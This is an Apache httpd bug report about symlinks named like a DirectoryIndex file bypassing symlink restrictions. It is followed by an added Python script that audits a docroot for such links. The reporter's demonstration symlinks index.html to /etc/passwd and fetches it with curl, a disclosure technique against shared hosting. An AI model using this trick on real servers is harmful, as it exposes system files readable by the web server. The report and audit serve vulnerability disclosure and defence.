Bug 47337 - FollowSymlinks and SymLinksIfOwnerMatch are ignored if a symlink's name conforms to DirectoryIndex
Status: RESOLVED DUPLICATE of bug 45959
Alias: None
Product: Apache httpd-2
Classification: Unclassified
Component: Core
Version: 2.2.11
Hardware: All Linux
Importance: P2 major
Target Milestone: ---
Assignee: Apache HTTPD Bugs Mailing List
 
Reported: 2009-06-09 09:07 UTC by Johannes Truschnigg
Modified: 2009-06-11 04:42 UTC

Description Johannes Truschnigg 2009-06-09 09:07:05 UTC
Apache ignores the SymLinksIfOwnerMatch and FollowSymlinks directives if the name of the symlink in question matches a valid value for DirectoryIndex.


Expected behaviour: 403 Forbidden, the symlink's target should not be delivered.

Observed behaviour: 200 OK, the symlink's target is delivered to the client.


Impact: This could prove a security problem, especially in shared hosting environments. It is possible to disclose confidential information by arbitrarily creating symlinks to files readable by the Apache process.


Demonstration:
--- snip ---
xy@v1384:~/dev/test$ ls -la . /etc/passwd
-rw-r--r-- 1 root root 1570 2009-03-23 11:06 /etc/passwd

.:
total 3
drwxr-xr-x 2 xy xy 1024 2009-06-09 16:50 .
drwxr-xr-x 5 xy xy 1024 2009-06-09 16:31 ..
-rw-r--r-- 1 xy xy   29 2009-06-09 16:48 .htaccess
lrwxrwxrwx 1 xy xy   11 2009-06-09 16:47 index.html -> /etc/passwd
lrwxrwxrwx 1 xy xy   11 2009-06-09 16:50 symlink -> /etc/passwd

xy@v1384:~/dev/test$ cat .htaccess
Options SymLinksIfOwnerMatch

xy@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/symlink
HTTP/1.1 403 Forbidden
Date: Tue, 09 Jun 2009 15:36:52 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1

xy@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/index.html
HTTP/1.1 403 Forbidden
Date: Tue, 09 Jun 2009 15:37:00 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1

xy@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/
HTTP/1.1 200 OK
Date: Tue, 09 Jun 2009 15:37:03 GMT
Server: Apache
Last-Modified: Mon, 23 Mar 2009 10:06:27 GMT
ETag: "f979d3e-622-465c66b6bcec0"
Accept-Ranges: bytes
Content-Length: 1570
Content-Type: text/html
--- snip ---


The above behaviour is the same if FollowSymlinks, instead of SymLinksIfOwnerMatch, is used to restrict access.
This is reproducible on Apache 2.2.9 (Debian Stable) and 2.2.11 (Gentoo ~x86).
Comment 1 Bob Ionescu 2009-06-11 04:42:52 UTC
This looks like a dupe of bug 45959. A patch was applied in r733754 to the 2.2 branch, which should fix the issue since vers. 2.2.12 (not released yet).

*** This bug has been marked as a duplicate of bug 45959 ***
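
An audit for the condition described in this report, as an added example (not code from the reporter or from the Apache project): it walks a document root and lists symlinks whose name is a DirectoryIndex candidate and whose target has a different owner or lies outside the docroot. The `INDEX_NAMES` values, the function names and the sample tree are assumptions made for illustration.

```python
import os
import tempfile

# Assumed DirectoryIndex values; use the ones from your own httpd configuration.
INDEX_NAMES = ("index.html", "index.htm", "index.php")

def audit_index_symlinks(docroot, index_names=INDEX_NAMES):
    """Return symlinks named like a DirectoryIndex entry whose target has a
    different owner than the link or resolves outside the docroot."""
    root = os.path.realpath(docroot)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if name not in index_names or not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            try:
                target_uid = os.stat(path).st_uid  # stat() follows the link
            except OSError:
                continue  # dangling link: there is no target to serve
            findings.append({
                "link": path,
                "target": target,
                "owner_mismatch": os.lstat(path).st_uid != target_uid,
                "outside_docroot": os.path.commonpath([root, target]) != root,
            })
    return [f for f in findings if f["owner_mismatch"] or f["outside_docroot"]]

def build_sample_tree(base):
    """Constructed layout mirroring the report: one file outside the docroot,
    linked as 'index.html' and as 'symlink', plus a regular index.html."""
    docroot = os.path.join(base, "htdocs", "test")
    os.makedirs(docroot)
    secret = os.path.join(base, "secret.txt")
    with open(secret, "w") as fh:
        fh.write("constructed sample data\n")
    os.symlink(secret, os.path.join(docroot, "index.html"))
    os.symlink(secret, os.path.join(docroot, "symlink"))
    os.makedirs(os.path.join(docroot, "ok"))
    with open(os.path.join(docroot, "ok", "index.html"), "w") as fh:
        fh.write("regular file\n")
    return os.path.join(base, "htdocs")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for finding in audit_index_symlinks(build_sample_tree(tmp)):
            print(finding)
```

Only the link named `index.html` is reported; the link named `symlink` is left out because, per the demonstration above, a direct request for it already returns 403.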